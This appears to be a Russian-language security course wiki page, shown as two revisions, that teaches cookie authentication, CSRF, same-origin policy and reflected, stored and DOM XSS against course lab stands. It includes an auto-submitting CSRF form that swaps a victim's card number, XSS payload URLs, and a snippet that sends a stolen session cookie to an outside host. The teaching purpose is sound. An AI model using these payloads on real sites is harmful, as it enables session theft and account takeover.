SecSem Wiki - Вклад [ru]

Введение в практическую безопасность (2019)/Атаки на клиента веб-приложения - CSRF & XSS

2022-07-04T13:15:16Z

Asterite: /* Reflected XSS */

При атаке на клиента атакующий пытается вынудить '''браузер''' клиента ('''жертвы''' атаки) выполнить какое-то действие с веб-приложением. Причина почему это может быть полезно атакующему - браузер клиента может быть '''аутентифицирован''' в приложении, запросы от него могут быть отличимы сервером, то есть сервер может понимать, что данный запрос сделан от имени конкретного пользователя.

== Аутентификация ==

Существуют различные способы, которыми сервер может отличать, от какого клиента пришёл запрос.

=== Сессии на основе Cookie ===

Наиболее часто используемый способ аутентификации в современный веб-приложениях - это '''cookie''' ([https://ru.wikipedia.org/wiki/Cookie википедия], [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies MDN]). Работает это очень просто: в HTTP-ответе сервер отправляет заголовок <code>Set-Cookie: COOKIENAME=SOMEUNIQUEVALUE</code>, где <code>SOMEUNIQUEVALUE</code> - какое-то значение, уникальное для этой '''сессии''' ('''идентификатор сессиии'''), <code>COOKIENAME</code> - имя сессионного идентификатора, имя, с которым ассоциировано это уникальное значение. Получив это значение, браузер запомнит его и будет отправлять на этот сайт с каждым последующим запросом в заголовке <code>Cookie</code> (кстати, что именно значит "на этот сайт" очень интересно - кука будет отправлена если обращаться на другой TCP, порт а также по дефолту на все поддомены. [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#Scope_of_cookies В доке MDN есть про это]). По тому что в запросе в заголовке <code>Cookie</code> будет это уникальное значение сервер будет понимать, что этот запрос относится к этой '''сессии''', в том числе, если эта сессия принадлежит какому-то клиенту, что этот запрос от этого клиента. Для примера можно залогиниться на http://pwnitter.stands.course.secsem.ru/ (для этого надо сначала зарегиться). При логине на сервер отправится такой запрос
<pre>
POST /login HTTP/1.1
Host: pwnitter.stands.course.secsem.ru
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
...

login=test&password=test
</pre>
В ответ сервер присылает заголовок <code>Set-Cookie: session=eyJ1c2VyIjoidGVzdCIsInVzZXJfaWQiOjN9.D3Az7g.wEXp46Qb6OpIPnwIYspV_cIUgug; Path=/</code>. Все последующие запросы клиента содержат заголовок с этим значением <code>Cookie: session=eyJ1c2VyIjoidGVzdCIsInVzZXJfaWQiOjN9.D3Az7g.wEXp46Qb6OpIPnwIYspV_cIUgug</code>. В качестве эксперимента можно убрать этот загловок или изменить его (скажем, удалить половину) и посмотреть, как изменится ответ сервера при запросе относящихся к конкретному пользователю ресурсов (к примеру <code>GET /api/get</code>).

Также можно попробовать залогиниться на каком-нибудь реальном сайте (скажем, vk.com или mail.ru) и посмотреть (например через Burp) на заголовки HTTP-запросов и ответов.

=== Другие варианты аутентификации ===

Протокол HTTP сам по себе поддерживает несколько вариантов аутентификации через заголовок <code>Authorization</code>, также при использовании HTTPS возможна аутентификация по клиентскому сертификату, наконец, возможны более простые варианты, например, по IP-адресу.

Все перечисленные варианты обладают одним общим свойством - любой запрос, отправленный аутентифицированным браузером на сайт, будет автоматически обладать аутентифицирующим признаком (например содержать аутентифицирующий токен - куку/учетные данные/...) и будет считаться сервером как сделанный от имени этого клиента. Это удобно, но это может помочь атакующему, если тот сможет вынудить браузер жертвы отправить запрос, который ни жертва, ни разработчик сайта, отправлять не собирались. (Кстати, таким свойством обладает не любой способ аутентификации. К примеру, если аутентифицировать запросы по кастомному заголовку или кастомному параметру запроса, то их браузер автоматически не пошлёт - правда, в случае кастомного заголовка всё взаимодействие с сервером придётся осуществлять через JavaScript, в целом, программирование сайта будет несколько сложнее).

== Cross-site request forgery ==

Прямой эксплуатацией описанного выше свойства является атака '''Cross-site request forgery''' ('''CSRF''', [https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) OWASP], [https://en.wikipedia.org/wiki/Cross-site_request_forgery википедия]). Эта атака имеет смысл когда существует существует запрос к серверу, который может внести на сервере какие-то изменения, причем эффект запроса зависит от того, какой пользователь его сделал (к примеру, запрос имеет право только определенный пользователь).
Например, на сайте http://zp.stands.course.secsem.ru/ у пользователей есть возможность изменить свой номер карты, записанный в профиле. В личном кабинете есть форма, посылающая на сервер запрос на изменение номера карты. Изменение делается запросом вида
<pre>
POST /lk HTTP/1.1
Host: zp.stands.course.secsem.ru
...
Cookie: session=eyJwYXNzd29yZCI6InRlc3QiLCJ1c2VybmFtZSI6InRlc3QifQ.XI7Y8g.pVkMZg6ZzsBYm8vZZw-PxGDMXaQ
...

card_number=372757798399775
</pre>
При этом то, в чьем профиле будет изменён номер карты, определяется именно кукой (отпрака этого запроса без куки или с невалидной кукой приводит к ошибке <code>400 BAD REQUEST</code>). Допустим, атакующий хочет изменить номер карты в профиле жертвы на свой - на '''6011720544333229'''. Он может создать страницу с HTML-кодом
<pre>
<form action="http://zp.stands.course.secsem.ru/lk" method="POST">
<input name="card_number" value="6011720544333229">
</form>
<script>
document.forms[0].submit();
</script>
</pre>
Эта страница содержит форму, отправка которой приводит к созданию как раз такого запроса на изменение номера карты как тот что создаёт сайт (атрибут <code>action</code> формы задаёт URL, на который будет отправлен запрос при отправке формы, <code>method</code> задаёт метод, параметры запроса определяются <code>input</code>'ами, при этом атрибут <code>name</code> задаёт название параметра, значением будет значение, заданое в <code>input</code>'е, атрибут <code>value</code> задаёт изначальнок значение). JS-код <code>document.forms[0].submit();</code> автоматически отправляет форму.

Если атакующему удастся каким-то образом заманить жертву на такую страницу (к примеру, он встроит её в сайт который жертва иногда посещает или атакующий может убедить жертву пройти по присланной ссылке), то при её посещении форма автоматически отправится и данные в профиле изменятся (в данном случае - номер карты поменяется на '''6011720544333229''', это можно легко проверить, сохранив приведенный выше HTML-код в HTML-файл, скажем, <code>test.html</code> и открыв его в браузере, будучи залогиненым на сайте, к стенду zp.stands.course.secsem.ru подходят логин/пароль <code>test</code>/<code>test</code>). Это и есть атака '''CSRF'''. В реальности могут быть и более серьёзные действия, которые можно сделать через CSRF, например удалить аккаунт или дать другому пользователю админские права или, скажем, сменить пароль.

Следует отметить что, если бы действие на сайте выполнялось не через <code>POST</code>-запрос, а через простой <code>GET</code> с передачей всех параметров в URL, атакующему было бы проще - никакую форму делать бы не пришлось, достаточно было бы перенаправить браузер жертвы на выполняющий действие URL, уже содержащий нужные атакующему параметры (перенаправление можно сделать со своего сервера через HTTP-редирект или из JavaScript кодом <code>location.href = "http://google.com/search?q=csrf"</code>) или, если атакующему удаётся заставить жертву перейти по присланной ссылке, просто дать жертве сразу выполняющую действие ссылку. Есть и другие способы заставить браузер жертвы сделать <code>GET</code>-запрос - к примеру, разместить на посещаемой жертвой странице скрипт или стиль или картинку с адресом - URL, соответствующим действию на сайте. Даже если на этот запрос не будет возвращаться валидный скрипт/стиль/картинка, чтобы это понять, браузеру придется сначала сделать запрос. Это одна из причин почему считается, что <code>GET</code>-запросы (а также запросы с другими '''safe''' методами) никогда не должны изменять состояние сервера, изменения должны делаться только через <code>POST</code> или другой '''unsafe''' метод. Про safe/unsafe методы: [https://tools.ietf.org/html/rfc7231#section-4.2.1 RFC], [https://developer.mozilla.org/en-US/docs/Glossary/safe MDN].

== JavaScript и Same-origin policy ==

Страницы, загруженные в браузере с одних сайтов, могут вызывать запросы к другим сайтам, как было рассмотрено выше (загрузка картинок, стилей, скриптов, перенаправления, автоматическая отправка форм). Однако, '''JavaScript''' - код может не только отправлять запросы, но и '''читать ответы на них''', а также делать что-то с прочитанными данными, в т. ч. передавать их еще куда-то. С помощью HTML-тега <code>iframe</code> ([https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe MDN]) можно создавать внутри страницы вложенные страницы и JS-код может читать их содержимое. Также, у JS-кода на веб-страницах есть собственные интерфейсы для отправки HTTP-запросов и чтения ответов - <code>XMLHttpRequest</code> ([https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest MDN]) и более новый <code>fetch</code>([https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/fetch MDN]). Если бы JS-код с любого сайта мог делать запросы '''на любой другой''' и '''читать ответы на них''', получилось бы совсем небезопасно - любой недоверенный сайт, посещенный пользователем, мог бы тут же запросить страницы его интернет-банка, его сообщений из социальных сетей, почты и т. д. и украсть всю информацию оттуда.

Чтобы побороться с этой проблемой, был введён принцип '''Same-origin policy''' ('''SOP''', [https://www.w3.org/Security/wiki/Same_Origin_Policy W3C], [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy MDN], [https://en.wikipedia.org/wiki/Same-origin_policy википедия]) - соглавно нему, JS-код на странице, загруженной с одного сайта, '''не может читать ответы''' на запросы к другому сайту, а также получать доступ к содержимому <code>iframe</code> с другого сайта. Опять возникает вопрос, что значит "с одного сайта" - более точно, SOP запрещает чтение ответа (а также, в некоторых случаях, ограничивает отправку запроса) у страницы с которой делается запрос и сайта, куда он посылается, отличается '''origin''' ([https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy#Definition_of_an_origin MDN]) - тройка из '''протокола''', '''хоста''' и '''порта'''. Т. е. если хотя бы один их этих параметров отличается (запрос делается с другим протоколом, скажем, http вместо https) или на другой порт или на другой хост (т. е. другое доменное имя или ip-адрес) то такой запрос будет считаться кросс-доменным и будет попадать под ограничение SOP. Существует несколько механизмов, которые позволяют сайтам управлять этими ограничениями - их можно ослабить, позволив одному сайту читать данные с другого с помощью [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS CORS] и, наоборот, усилить (скажем, запретив включать с другого сайта даже картинки) с помощью [https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP CSP].

В любом случае, в итоге, по умолчанию в современном интернете JS-код на страницах одного сайта (evil.com) не может прочесть данные с другого сайта (victim.site). Однако, что если бы атакующему удалось поместить свой JS-код на страницы c '''того же сайта''', атакуемого, прямо на victim.site?

== Cross-site scripting ==

В случае, если атакующему удаётся выполнить свой JS-код на странице атакуемого сайта, это позволяет провести уже более серьёзную атаку - '''Cross-site scripting''' ('''XSS''', [https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) OWASP], [https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting MDN], [https://en.wikipedia.org/wiki/Cross-site_scripting википедия]). Поскольку страница, на которой выполняется код, принадлежит атакуемому сайту, у неё будет его '''origin''', то этот код сможет читать как содержимое этой страницы, так и делать запросы к этому сайту и '''читать ответы на них, получая полный доступ ко всему на этом сайте, к чему имеет доступ сам пользователь'''.

=== Reflected XSS ===

Простейшим вариантом XSS является '''Reflected XSS''' (также называемый XSS типа 1), при которой часть запроса на сайт включается без достаточной фильтрации (например, вообще без изменений) в ответ на этот запрос. К примеру, у сайта http://pwnitter.stands.course.secsem.ru/ есть страничка приветствия только что зарегистрированного пользователя: http://pwnitter.stands.course.secsem.ru/registration-complete?name=newuser. Она работает так что берётся параметр <code>name</code> из query string запроса и as-is помещается в ответ, после надписи <code>Hello, </code>, получается приветствие. В случае, если в параметре <code>name</code> будут управляющие символы HTML, они также будут помещены на страницу и с помощью них могут быть сформированы HTML-тэги. Для браузера они будут выглядеть как часть разметки страницы, сгенерированной сервером и он проинтерпретирует их соответствующим образом, он не знает что эта часть страницы пришла из запроса пользователя <s>(на самом деле в '''Google Chrome''' есть защитный механизм [https://www.chromium.org/developers/design-documents/xss-auditor XSS auditor], который пытается это понимать и блокирует такие запросы, поэтому экспериментировать лучше в Firefox)</s>. В результате, при переходе по ссылке http://pwnitter.stands.course.secsem.ru/registration-complete?name=%3Cscript%3Ealert('SCRIPT+FROM+ATTACKER');%3C/script%3E браузер получит страницу, содержащую тег <code><script>alert('SCRIPT FROM ATTACKER');</script></code>, что на Firefox должно привести выполнению JS-кода <code>alert('SCRIPT FROM ATTACKER');</code> и появлению окошка с надписью <code>SCRIPT FROM ATTACKER</code> <s>(а в Chrome - к странице с сообщением о блокировке с надписью <code>ERR_BLOCKED_BY_XSS_AUDITOR</code>)</s>. В итоге, если атакующий может, как и в предыдущем сценарии с CSRF, убедить жертву перейти по переданной ссылке (или зайти на контроллируемый атакующим сайт что в данном случае равноценно т.к. можно сделать <code>iframe</code> или редирект), то атакующий сможет получит доступ и украсть любые данные, доступные жертве.

=== Эксплуатация XSS ===

Конкретнее, атакующий может
* получить '''cookie''' через свойство <code>document.cookie</code>. По-умолчанию JavaScript-код может считывать значения кук и менять их. Это протейший способ эксплуатации XSS, после кражи сессионного идентификатора атакующий может просто уже самостоятельно делать запросы, передавая его в заголовке <code>Cookie</code>, сайт будет воспринимать эти запросы как пришедшие от пользователя-жертвы, так что дальше атакующий сможет получить доступ ко всем данным жетвы, просто запрашивая их. Чтение куки из JS-кода можно запретить, выставив атрибут куки <code>HttpOnly</code> ([https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#Secure_and_HttpOnly_cookies MDN], [https://www.owasp.org/index.php/HttpOnly OWASP]), он выставляется вместе с кукой в заголовке ответа <code>Set-Cookie: session=eyJ1c2VyIjoibGlsIiwidXNlcl9pZCI6M30.XI9rjw.-tX3LIQ-cwyUnNlOuQqyVXBu99A; HttpOnly; Path=/</code>. Проверить, сработает ли кража куки можно, залогинившись и обратившись к <code>document.cookie</code> (в браузерной консоли или по-другому из JS кода). Например, можно будучи залогиненым перейти по урлу http://pwnitter.stands.course.secsem.ru/registration-complete?name=%3cscript%3ealert('STOLENCOOKIE:+'+%2b+document.cookie);%3c/script%3e (обратите внимание, что тут плюс (<code>+</code>) закодирован URL-кодированием и выглядит как <code>%2b</code> - без этого он по правилам URL-кодирования превратился бы в пробел.
* читать (и изменять) страницу, на которой выполняется JS-код. JavaScript-код может произвольным образом манипулировать страницей, используя интерфейс '''Document Object Model''' ('''DOM''', [https://en.wikipedia.org/wiki/Document_Object_Model википедия], [https://developer.mozilla.org/en-US/docs/Web/API/Document_Object_Model MDN]). К примеру, весь HTML-код страницы можно считать таким кодом <code>var wholePage = document.documentElement.outerHTML;</code>
* делать HTTP-запросы к сайту и читать ответы на них, используя '''XMLHttpRequest''' и '''fetch'''
* выводить считанные данные '''на сервер атакующего'''. Как уже обсуждалось выше, JS-код на странице '''может''' делать запросы к другим сайтам (по умолчанию читать ответы не получится, но, во-первых, для вывода украденных данных достаточно сделать запрос, во-вторых, в крайнем случае атакующий может включить на своём cервере '''CORS''').
** Для отправки запроса, содержащего украденные данные, можно использовать XMLHttpRequest/fetch
** есть еще более простой трюк - создать в JS-коде изображение с URL, хостом которого будет сервер атакующего, а в пути или query string будут украденные данные. При попытке загрузить изображение по этому URL браузер отправит запрос, включающий украденные данные, атакующий увидит его, скажем, в логах своего сервера. Например, такой код <code>var i = new Image;var stolenCookie = document.cookie; i.src = 'https://utkautkautkautkautka.pythonanywhere.com/stolen?data=' + stolenCookie</code> приведёт к тому что браузер откроет URL https://utkautkautkautkautka.pythonanywhere.com/stolen?data=session=eyJ1c2VyIjoibGlsIiwidXNlcl9pZCI6M30.D3EBFA.F9g-ANJQvCGlewtSVEbYIYfyLXk и а логах этого сервера появится запись <code>"GET /stolen?data=session=eyJ1c2VyIjoibGlsIiwidXNlcl9pZCI6M30.D3EBFA.F9g-ANJQvCGlewtSVEbYIYfyLXk HTTP/1.1" 404</code>, содержащая украденную куку.
** При выводе данных атакующему может помогать кодировать данные (чтобы, скажем, они не образались по какому-нибудь символу-разделителю). Очень полезна функция <code>btoa</code>, которая кодирует строку в '''base64'''. Другим вариантом может быть URL-кодирование (<code>encodeURIComponent</code>).

=== Stored XSS ===

'''Stored XSS''' (или XSS типа 2) имеет место, когда атакующий JS-код '''сохраняется на сервере''' и возвращается не в ответ на запрос, передающий этот код (или не только на него), но и на другие запросы, уже не содержащие атаку. На стенде http://pwnitter.stands.course.secsem.ru/ примером stored XSS является XSS в личных сообщениях. Текст личного сообщения никак не фильтруется и подставляется в страницу входящих сообщений as-is, что позволяет внедрить произвольный JS-код. Stored XSS намного опаснее, т. к., во-первых, вредоносный код сохраняется на сервере и может отработать несколько раз без дополнительных действий со стороны атакующего, во-вторых, жетва не должна как-то "подыгрывать" атакующему, переходя по подозрительным ссылкам или заходя на недоверенные сайты; жетва может делать вполне обычные действия, посещая вполне легитимные страницы сайта (в данном случае - простматривая личные сообщения) и при этом подвергнуться атаке.

=== DOM-based XSS ===

'''DOM-based XSS''' ('''DOMXSS''' или XSS типа 3) - XSS, вызванная действиями клиентского JS-кода, а не сервера. JavaScript-код может произвольным образом менять сожержимое страницы, в т. ч. добавить на неё новый скрипт, что может привести к его выполнению. Кроме того, у JavaScript есть ряд способов непосредственно выполнить новый JS-код (<code>eval</code>,<code>Function</code> и не только). В итоге, ошибка в клиентском коде (в простейшем случае - опять же, подстановка пользовательских данных на страницу без должной фильтрации) может приводить к XSS, при этом вредоносный код может даже не отправляться на сервер и атака может пройти для сервера полностью незамеченной. Примером DOMXSS на стенде http://pwnitter.stands.course.secsem.ru/ является XSS в "твитах". Они грузятся с сервера асинхронно JS-кодом (с помощью XMLHttpRequest) и помещаются в код страницы через присваивания свойства <code>innerHTML</code> ([https://developer.mozilla.org/en-US/docs/Web/API/Element/innerHTML MDN]). Никакой фильтрации опять-таки не производится, что позволяет внедрить на страницу разметку. Что интересно, код в теге <code>script</code> при этом не выполнится - он не выполняется автоматически при добавке <code>script</code> через <code>innerHTML</code>. Однако, здесь может сработать другой, более универсальный вектор - обработчик события. Одним из наиболее часто используемых векторов атаки является тег <code>img</code> с невалидным урлом и обработчиком ошибки: <code><img src=invalidsource onerror="alert('XSS')"></code>. В принципе, DOMXSS тоже можно классифицировать как Reflected и Stored, в зависимости от того, берет ли уязвимый клиентский код атакующие данные из запроса клиента или же они где-то сохранены. В данном случае, скорее, Stored, так как "твит" сохранится на сервере и будет отдаваться в списке, что приведет к атаки на любых пользователей, которые, скажем, зашли посмотреть список рандомных твитов.

=== XSS vs CSRF ===

Хорошим тестом на понимание является ответ на вопрос - что сильнее, XSS или CSRF и нужно ли искать/может ли быть полезным CSRF если уже удаётся эксплуатировать на сайте XSS.

Введение в практическую безопасность (2019)/Атаки на клиента веб-приложения - CSRF & XSS

2022-07-04T13:14:54Z

Asterite: /* Reflected XSS */

При атаке на клиента атакующий пытается вынудить '''браузер''' клиента ('''жертвы''' атаки) выполнить какое-то действие с веб-приложением. Причина почему это может быть полезно атакующему - браузер клиента может быть '''аутентифицирован''' в приложении, запросы от него могут быть отличимы сервером, то есть сервер может понимать, что данный запрос сделан от имени конкретного пользователя.

== Аутентификация ==

Существуют различные способы, которыми сервер может отличать, от какого клиента пришёл запрос.

=== Сессии на основе Cookie ===

Наиболее часто используемый способ аутентификации в современный веб-приложениях - это '''cookie''' ([https://ru.wikipedia.org/wiki/Cookie википедия], [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies MDN]). Работает это очень просто: в HTTP-ответе сервер отправляет заголовок <code>Set-Cookie: COOKIENAME=SOMEUNIQUEVALUE</code>, где <code>SOMEUNIQUEVALUE</code> - какое-то значение, уникальное для этой '''сессии''' ('''идентификатор сессиии'''), <code>COOKIENAME</code> - имя сессионного идентификатора, имя, с которым ассоциировано это уникальное значение. Получив это значение, браузер запомнит его и будет отправлять на этот сайт с каждым последующим запросом в заголовке <code>Cookie</code> (кстати, что именно значит "на этот сайт" очень интересно - кука будет отправлена если обращаться на другой TCP, порт а также по дефолту на все поддомены. [https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#Scope_of_cookies В доке MDN есть про это]). По тому что в запросе в заголовке <code>Cookie</code> будет это уникальное значение сервер будет понимать, что этот запрос относится к этой '''сессии''', в том числе, если эта сессия принадлежит какому-то клиенту, что этот запрос от этого клиента. Для примера можно залогиниться на http://pwnitter.stands.course.secsem.ru/ (для этого надо сначала зарегиться). При логине на сервер отправится такой запрос
<pre>
POST /login HTTP/1.1
Host: pwnitter.stands.course.secsem.ru
...
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
...

login=test&password=test
</pre>
В ответ сервер присылает заголовок <code>Set-Cookie: session=eyJ1c2VyIjoidGVzdCIsInVzZXJfaWQiOjN9.D3Az7g.wEXp46Qb6OpIPnwIYspV_cIUgug; Path=/</code>. Все последующие запросы клиента содержат заголовок с этим значением <code>Cookie: session=eyJ1c2VyIjoidGVzdCIsInVzZXJfaWQiOjN9.D3Az7g.wEXp46Qb6OpIPnwIYspV_cIUgug</code>. В качестве эксперимента можно убрать этот загловок или изменить его (скажем, удалить половину) и посмотреть, как изменится ответ сервера при запросе относящихся к конкретному пользователю ресурсов (к примеру <code>GET /api/get</code>).

Также можно попробовать залогиниться на каком-нибудь реальном сайте (скажем, vk.com или mail.ru) и посмотреть (например через Burp) на заголовки HTTP-запросов и ответов.

=== Другие варианты аутентификации ===

Протокол HTTP сам по себе поддерживает несколько вариантов аутентификации через заголовок <code>Authorization</code>, также при использовании HTTPS возможна аутентификация по клиентскому сертификату, наконец, возможны более простые варианты, например, по IP-адресу.

Все перечисленные варианты обладают одним общим свойством - любой запрос, отправленный аутентифицированным браузером на сайт, будет автоматически обладать аутентифицирующим признаком (например содержать аутентифицирующий токен - куку/учетные данные/...) и будет считаться сервером как сделанный от имени этого клиента. Это удобно, но это может помочь атакующему, если тот сможет вынудить браузер жертвы отправить запрос, который ни жертва, ни разработчик сайта, отправлять не собирались. (Кстати, таким свойством обладает не любой способ аутентификации. К примеру, если аутентифицировать запросы по кастомному заголовку или кастомному параметру запроса, то их браузер автоматически не пошлёт - правда, в случае кастомного заголовка всё взаимодействие с сервером придётся осуществлять через JavaScript, в целом, программирование сайта будет несколько сложнее).

== Cross-site request forgery ==

Прямой эксплуатацией описанного выше свойства является атака '''Cross-site request forgery''' ('''CSRF''', [https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) OWASP], [https://en.wikipedia.org/wiki/Cross-site_request_forgery википедия]). Эта атака имеет смысл когда существует существует запрос к серверу, который может внести на сервере какие-то изменения, причем эффект запроса зависит от того, какой пользователь его сделал (к примеру, запрос имеет право только определенный пользователь).
Например, на сайте http://zp.stands.course.secsem.ru/ у пользователей есть возможность изменить свой номер карты, записанный в профиле. В личном кабинете есть форма, посылающая на сервер запрос на изменение номера карты. Изменение делается запросом вида
<pre>
POST /lk HTTP/1.1
Host: zp.stands.course.secsem.ru
...
Cookie: session=eyJwYXNzd29yZCI6InRlc3QiLCJ1c2VybmFtZSI6InRlc3QifQ.XI7Y8g.pVkMZg6ZzsBYm8vZZw-PxGDMXaQ
...

card_number=372757798399775
</pre>
При этом то, в чьем профиле будет изменён номер карты, определяется именно кукой (отпрака этого запроса без куки или с невалидной кукой приводит к ошибке <code>400 BAD REQUEST</code>). Допустим, атакующий хочет изменить номер карты в профиле жертвы на свой - на '''6011720544333229'''. Он может создать страницу с HTML-кодом
<pre>
<form action="http://zp.stands.course.secsem.ru/lk" method="POST">
<input name="card_number" value="6011720544333229">
</form>
<script>
document.forms[0].submit();
</script>
</pre>
Эта страница содержит форму, отправка которой приводит к созданию как раз такого запроса на изменение номера карты как тот что создаёт сайт (атрибут <code>action</code> формы задаёт URL, на который будет отправлен запрос при отправке формы, <code>method</code> задаёт метод, параметры запроса определяются <code>input</code>'ами, при этом атрибут <code>name</code> задаёт название параметра, значением будет значение, заданое в <code>input</code>'е, атрибут <code>value</code> задаёт изначальнок значение). JS-код <code>document.forms[0].submit();</code> автоматически отправляет форму.

Если атакующему удастся каким-то образом заманить жертву на такую страницу (к примеру, он встроит её в сайт который жертва иногда посещает или атакующий может убедить жертву пройти по присланной ссылке), то при её посещении форма автоматически отправится и данные в профиле изменятся (в данном случае - номер карты поменяется на '''6011720544333229''', это можно легко проверить, сохранив приведенный выше HTML-код в HTML-файл, скажем, <code>test.html</code> и открыв его в браузере, будучи залогиненым на сайте, к стенду zp.stands.course.secsem.ru подходят логин/пароль <code>test</code>/<code>test</code>). Это и есть атака '''CSRF'''. В реальности могут быть и более серьёзные действия, которые можно сделать через CSRF, например удалить аккаунт или дать другому пользователю админские права или, скажем, сменить пароль.

Следует отметить что, если бы действие на сайте выполнялось не через <code>POST</code>-запрос, а через простой <code>GET</code> с передачей всех параметров в URL, атакующему было бы проще - никакую форму делать бы не пришлось, достаточно было бы перенаправить браузер жертвы на выполняющий действие URL, уже содержащий нужные атакующему параметры (перенаправление можно сделать со своего сервера через HTTP-редирект или из JavaScript кодом <code>location.href = "http://google.com/search?q=csrf"</code>) или, если атакующему удаётся заставить жертву перейти по присланной ссылке, просто дать жертве сразу выполняющую действие ссылку. Есть и другие способы заставить браузер жертвы сделать <code>GET</code>-запрос - к примеру, разместить на посещаемой жертвой странице скрипт или стиль или картинку с адресом - URL, соответствующим действию на сайте. Даже если на этот запрос не будет возвращаться валидный скрипт/стиль/картинка, чтобы это понять, браузеру придется сначала сделать запрос. Это одна из причин почему считается, что <code>GET</code>-запросы (а также запросы с другими '''safe''' методами) никогда не должны изменять состояние сервера, изменения должны делаться только через <code>POST</code> или другой '''unsafe''' метод. Про safe/unsafe методы: [https://tools.ietf.org/html/rfc7231#section-4.2.1 RFC], [https://developer.mozilla.org/en-US/docs/Glossary/safe MDN].

== JavaScript и Same-origin policy ==

Страницы, загруженные в браузере с одних сайтов, могут вызывать запросы к другим сайтам, как было рассмотрено выше (загрузка картинок, стилей, скриптов, перенаправления, автоматическая отправка форм). Однако, '''JavaScript''' - код может не только отправлять запросы, но и '''читать ответы на них''', а также делать что-то с прочитанными данными, в т. ч. передавать их еще куда-то. С помощью HTML-тега <code>iframe</code> ([https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe MDN]) можно создавать внутри страницы вложенные страницы и JS-код может читать их содержимое. Также, у JS-кода на веб-страницах есть собственные интерфейсы для отправки HTTP-запросов и чтения ответов - <code>XMLHttpRequest</code> ([https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest MDN]) и более новый <code>fetch</code>([https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/fetch MDN]). Если бы JS-код с любого сайта мог делать запросы '''на любой другой''' и '''читать ответы на них''', получилось бы совсем небезопасно - любой недоверенный сайт, посещенный пользователем, мог бы тут же запросить страницы его интернет-банка, его сообщений из социальных сетей, почты и т. д. и украсть всю информацию оттуда.

Чтобы побороться с этой проблемой, был введён принцип '''Same-origin policy''' ('''SOP''', [https://www.w3.org/Security/wiki/Same_Origin_Policy W3C], [https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy MDN], [https://en.wikipedia.org/wiki/Same-origin_policy википедия]) - соглавно нему, JS-код на странице, загруженной с одного сайта, '''не может читать ответы''' на запросы к другому сайту, а также получать доступ к содержимому <code>iframe</code> с другого сайта. Опять возникает вопрос, что значит "с одного сайта" - более точно, SOP запрещает чтение ответа (а также, в некоторых случаях, ограничивает отправку запроса) у страницы с которой делается запрос и сайта, куда он посылается, отличается '''origin''' ([https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy#Definition_of_an_origin MDN]) - тройка из '''протокола''', '''хоста''' и '''порта'''. Т. е. если хотя бы один их этих параметров отличается (запрос делается с другим протоколом, скажем, http вместо https) или на другой порт или на другой хост (т. е. другое доменное имя или ip-адрес) то такой запрос будет считаться кросс-доменным и будет попадать под ограничение SOP. Существует несколько механизмов, которые позволяют сайтам управлять этими ограничениями - их можно ослабить, позволив одному сайту читать данные с другого с помощью [https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS CORS] и, наоборот, усилить (скажем, запретив включать с другого сайта даже картинки) с помощью [https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP CSP].

В любом случае, в итоге, по умолчанию в современном интернете JS-код на страницах одного сайта (evil.com) не может прочесть данные с другого сайта (victim.site). Однако, что если бы атакующему удалось поместить свой JS-код на страницы c '''того же сайта''', атакуемого, прямо на victim.site?

== Cross-site scripting ==

В случае, если атакующему удаётся выполнить свой JS-код на странице атакуемого сайта, это позволяет провести уже более серьёзную атаку - '''Cross-site scripting''' ('''XSS''', [https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) OWASP], [https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting MDN], [https://en.wikipedia.org/wiki/Cross-site_scripting википедия]). Поскольку страница, на которой выполняется код, принадлежит атакуемому сайту, у неё будет его '''origin''', то этот код сможет читать как содержимое этой страницы, так и делать запросы к этому сайту и '''читать ответы на них, получая полный доступ ко всему на этом сайте, к чему имеет доступ сам пользователь'''.

=== Reflected XSS ===

Простейшим вариантом XSS является '''Reflected XSS''' (также называемый XSS типа 1), при которой часть запроса на сайт включается без достаточной фильтрации (например, вообще без изменений) в ответ на этот запрос. К примеру, у сайта http://pwnitter.stands.course.secsem.ru/ есть страничка приветствия только что зарегистрированного пользователя: http://pwnitter.stands.course.secsem.ru/registration-complete?name=newuser. Она работает так что берётся параметр <code>name</code> из query string запроса и as-is помещается в ответ, после надписи <code>Hello, </code>, получается приветствие. В случае, если в параметре <code>name</code> будут управляющие символы HTML, они также будут помещены на страницу и с помощью них могут быть сформированы HTML-тэги. Для браузера они будут выглядеть как часть разметки страницы, сгенерированной сервером и он проинтерпретирует их соответствующим образом, он не знает что эта часть страницы пришла из запроса пользователя <s>(на самом деле в '''Google Chrome''' есть защитный механизм [https://www.chromium.org/developers/design-documents/xss-auditor XSS auditor], который пытается это понимать и блокирует такие запросы, поэтому экспериментировать лучше в Firefox)</s>. В результате, при переходе по ссылке http://pwnitter.stands.course.secsem.ru/registration-complete?name=%3Cscript%3Ealert('SCRIPT+FROM+ATTACKER');%3C/script%3E браузер получит страницу, содержащую тег <code><script>alert('SCRIPT FROM ATTACKER');</script></code>, что на Firefox должно привести выполнению JS-кода <code>alert('SCRIPT FROM ATTACKER');</code> и появлению окошка с надписью <code>SCRIPT FROM ATTACKER</code> (а в Chrome - к странице с сообщением о блокировке с надписью <code>ERR_BLOCKED_BY_XSS_AUDITOR</code>). В итоге, если атакующий может, как 